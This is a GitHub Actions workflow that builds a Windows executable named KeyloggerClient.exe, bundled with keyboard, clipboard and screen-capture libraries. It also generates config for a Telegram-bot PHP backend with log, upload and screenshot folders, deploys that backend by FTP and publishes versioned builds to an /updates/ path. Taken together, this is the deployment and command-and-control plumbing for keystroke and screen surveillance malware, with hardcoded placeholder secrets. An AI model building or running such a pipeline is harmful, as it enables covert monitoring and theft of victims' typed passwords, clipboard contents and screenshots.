name: Build and Deploy Telegram PHP Backend + Windows EXE

on:
  push:
    branches:
      - main

jobs:
  deploy:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    - name: Install Python & dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pyinstaller keyboard pyautogui psutil pyperclip pillow pywin32

    - name: Build Windows EXE from Python
      run: |
        python build.py

    - name: Rename built EXE by version
      shell: bash
      run: |
        VERSION="${{ secrets.CLIENT_VERSION }}"
        RENAMED="version_${VERSION//./_}.exe"
        mv dist/KeyloggerClient.exe dist/$RENAMED
        echo "RENAMED_FILE=$RENAMED" >> $GITHUB_ENV

    - name: Generate .env file from secrets
      shell: bash
      run: |
        mkdir -p telegram/log telegram/uploads telegram/screenshots
        echo "BASE_URL=${{ secrets.BASE_URL }}" > telegram/.env
        echo "SERVER_URL=${{ secrets.BASE_URL }}/api.php" >> telegram/.env
        echo "BOT_TOKEN=${{ secrets.BOT_TOKEN }}" >> telegram/.env
        echo "WEBHOOK_SECRET=${{ secrets.WEBHOOK_SECRET }}" >> telegram/.env
        echo "ADMIN_CHAT_ID=${{ secrets.ADMIN_CHAT_ID }}" >> telegram/.env
        echo "DB_HOST=${{ secrets.DB_HOST }}" >> telegram/.env
        echo "DB_NAME=${{ secrets.DB_NAME }}" >> telegram/.env
        echo "DB_USER=${{ secrets.DB_USER }}" >> telegram/.env
        echo "DB_PASS=${{ secrets.DB_PASS }}" >> telegram/.env
        echo "SECRET_TOKEN=1" >> telegram/.env
        echo "ENCRYPTION_KEY=dGVzdF9rZXk=" >> telegram/.env
        echo "CLIENT_VERSION=${{ secrets.CLIENT_VERSION }}" >> telegram/.env

    - name: Upload Telegram PHP to FTP
      uses: SamKirkland/FTP-Deploy-Action@4.0.0
      with:
        server: ${{ secrets.FTP_HOST }}
        username: ${{ secrets.FTP_USERNAME }}
        password: ${{ secrets.FTP_PASSWORD }}
        local-dir: telegram/
        server-dir: ${{ secrets.FTP_PATH }}/
        exclude: |
          **/.git*
          **/.github*
          **/node_modules/*

    - name: Upload built EXE to FTP /updates/
      shell: bash
      run: |
        curl -T "dist/$RENAMED_FILE" \
          --user "${{ secrets.FTP_USERNAME }}:${{ secrets.FTP_PASSWORD }}" \
          "ftp://${{ secrets.FTP_HOST }}${{ secrets.FTP_PATH }}/updates/$RENAMED_FILE"
    